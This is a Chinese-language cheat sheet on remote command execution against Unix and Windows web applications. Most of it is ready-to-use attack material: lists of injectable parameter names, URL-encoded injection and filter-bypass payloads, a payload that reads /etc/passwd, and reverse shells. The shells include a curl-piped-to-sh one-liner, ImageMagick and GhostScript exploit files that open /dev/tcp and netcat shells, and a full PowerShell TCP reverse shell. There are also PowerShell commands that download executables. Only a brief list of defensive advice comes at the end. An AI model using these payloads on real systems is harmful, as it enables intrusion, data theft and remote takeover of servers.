远程命令执行漏洞总结(Unix和Windows)
字数 902 2025-08-05 08:18:04
远程命令执行漏洞总结(Unix和Windows)
一、前言
远程代码执行(RCE)使攻击者能够通过注入攻击执行恶意代码。代码注入攻击与命令注入攻击不同,攻击者的成果取决于服务器端的限制。在某些情况下,攻击者可能能够从代码注入升级为命令注入。远程代码攻击可能会完全破坏易受攻击的Web应用程序以及Web服务器。
二、Unix RCE
1. Top 46 RCE参数
以下是常见的易受RCE攻击的参数名称:
exec={payload} payload={payload}
command={payload} run={payload}
execute{payload} print={payload}
ping={payload} email={payload}
include={payload} id={payload}
exclude={payload} username={payload}
jump={payload} user={payload}
code={payload} to={payload}
reg={payload} from={payload}
do={payload} search={payload}
func={payload} query={payload}
arg={payload} q={payload}
option={payload} s={payload}
load={payload} shopId={payload}
process={payload} blogId={payload}
step={payload} phone={payload}
read={payload} mode={payload}
function={payload} next={payload}
req={payload} firstname={payload}
feature={payload} lastname={payload}
exe={payload} locale={payload}
module={payload} cmd={payload}
system={payload} sys={payload}
2. 危险字符逃逸技术
以下是一些用于绕过过滤的危险字符和编码技术:
基本命令注入
%7Cid
%7cid;pwd;uname -a
%26 id %26
%0aid%0a
%0a uname -a %0a
引号变种
%27%0Awhoami%0A%27
%22%0Awhoami%0A%22
%5C%0Awhoami
%27%27%0Awhoami%0A%27%27
特殊字符组合
%2A%0Awhoami%0A
%2A%0Awhoami%0A%2A
%28%0Awhoami%0A%29
%60%0Aid%0A%60
分号和管道
%3B%0Awhoami%0A%3B
%2C%0Awhoami%0A%2C
%7C%0Awhoami
%7C%0Awhoami%0A%7C
文件读取技术
%0Acat%20/etc/passwd
%7C%7Cid%0A
%2C%20id
复杂变种
%22%2C%0Asystem%28%27ls%27%29%0A%3B%22
%27%0Aid%0A%27
%5C%0Awhoami%0A%5C
%26%0Awhoami%0A%26
3. RCE绕过技术
基本绕过
'
whoami
'
"
whoami
"
`
whoami
`
;
whoami
;
,
whoami
,
|
whoami
|
whoami
|
\
whoami
特殊字符绕过
''
whoami
''
*
whoami
*
whoami
*
(
whoami
)
\
whoami
\
4. 反弹Shell技术
简单方法
nc -l 1337
curl https://reverse-shell.sh/yourip:1337 | sh
使用Reverse Shell Generator
https://www.revshells.com
5. 真实案例
在测试中发现include参数容易受到RCE攻击,通过以下步骤绕过:
- 原始payload被WAF拦截
- 进行URL编码
- 最终bypass payload:
%27%0a%77%68%6f%61%6d%69%20%26%26%20%69%64%20%26%26%20%75%6e%61%6d%65%20%2d%61%20%26%26%20%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%0a%27
三、文件上传中的RCE
1. Imagemagick RCE
测试文件内容(test.gif或test.jpg)
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL3lvdXJpcC95b3VycG9ydCAwPiYx | base64 -d | bash`"||id " )'
pop graphic-context
另一种变体
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/yourip/yourport 0<&1 2>&1'
pop graphic-context
pop graphic-context
poc.xml内容
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
"http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg"|/bin/nc.traditional yourip yourport -e /bin/bash""
x="0" y="0" height="640px" width="480px"/>
</svg>
2. GhostScript RCE
测试文件内容(test.gif或test.jpg)
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops
poc.pdf内容
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl http://inputburpcollaborator)
.putdeviceparams
quit
3. 相关工具
- 上传功能中查找RCE漏洞的工具:
https://github.com/modzero/mod0BurpUploadScanner.git - 查找RCE漏洞(框架/库)的工具:
https://github.com/ambionics/phpggc
四、Windows RCE
1. Payload列表
基本命令执行
".system('dir')."
' dir
' || dir
' & dir
' && dir
'; dir
" dir
" || dir
" | dir
" & dir
" && dir
"; dir
dir
$(`dir`)
目录遍历
&&dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir
; dir
& dir
&& dir
系统信息
| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all
PHP相关
|| phpinfo()
| phpinfo()
{${phpinfo()}}
;phpinfo()
;phpinfo();//
';phpinfo();//
{${phpinfo()}}
& phpinfo()
&& phpinfo()
phpinfo()
phpinfo();
2. 危险字符逃逸
URL编码变种
%27%20dir
%27%20%7C%7C%20dir
%27%20%26%20dir
%27%20%26%26%20dir
%27%3B%20dir
%22%20dir
%22%20%7C%7C%20dir
%22%20%7C%20dir
%22%20%26%20dir
%22%20%26%26%20dir
%22%3B%20dir
%22.system%28%27dir%27%29.%22
%24%28%60dir%60%29
复杂绕过
%7C%20dir%20C%3A%5C
%3B%20dir%20C%3A%5C
%26%20dir%20C%3A%5C
%26%26%20dir%20C%3A%5C
dir%20C%3A%5C
%7C%20dir
%3B%20dir
%26%20dir
%26%26%20dir
特殊技术
+dir+c:\+|
+|+dir+c:\+|
+|+dir+c:%2f+|
dir+c:\
||+dir|c:\
+|+Dir+c:\
+|+Dir+c:%255c
+|+Dir+c:%2f
$+|+Dir+c:\
$+|+Dir+c:%255c
$+|+Dir+c:%2f
3. 反弹Shell
监听
nc -nvlp 443
PowerShell反弹Shell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('your ip',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =
$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.T
ext.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII
).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c
lient.Close()"
生成反弹Shell的网址
https://www.revshells.com
4. 文件下载
PowerShell下载文件
powershell -c "(new-object
System.Net.WebClient).DownloadFile('https://eternallybored.org/misc/wget/1.21.1/64/wget.exe','C:\Users\admin\Desktop\wget.exe')"
替代方法
powershell iwr -uri http://10.10.16.97:8000/chisel.exe -outfile ch.exe
五、总结
1. 推荐工具
- Burpsuite中发现RCE漏洞的最佳插件(Unix和Windows):
https://github.com/ewilded/shelling - 最佳命令注入攻击工具:
https://github.com/commixproject/commix
2. 防御建议
- 对所有用户输入进行严格验证和过滤
- 使用白名单而非黑名单方法
- 最小化系统命令执行功能的使用
- 实施适当的权限分离
- 定期更新和修补系统组件
3. 参考资源
原文地址:
https://ansar0047.medium.com/remote-code-execution-unix-and-windows-4ed3367158b3